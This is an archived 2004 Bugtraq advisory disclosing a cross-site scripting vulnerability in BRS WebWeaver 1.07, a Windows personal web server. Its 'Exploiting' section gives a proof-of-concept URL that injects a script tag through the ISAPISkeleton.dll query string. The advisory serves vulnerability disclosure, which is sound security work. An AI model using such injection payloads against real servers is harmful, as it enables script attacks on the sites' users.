[33292] in bugtraq
BRS WebWeaver Webserver Cross Site Scripting Vulnerability
daemon@ATHENA.MIT.EDU (Oliver Karow)
Wed Jan 28 15:40:50 2004
Message-ID: <40179E55.1070802@gmx.de>
Date: Wed, 28 Jan 2004 12:34:45 +0100
From: Oliver Karow <oliver.karow@gmx.de>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
BRS WebWeaver Webserver Cross Site Scripting Vulnerability
================================================
Whatis:
=====
BRS WebWeaver is a free personal web server that runs on the Windows
platform.
Version:
======
V 1.07
Exploiting:
=======
http://127.0.0.1/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script>
Vendor:
======
http://www.brswebweaver.com
Credit:
=====
www.oliverkarow.de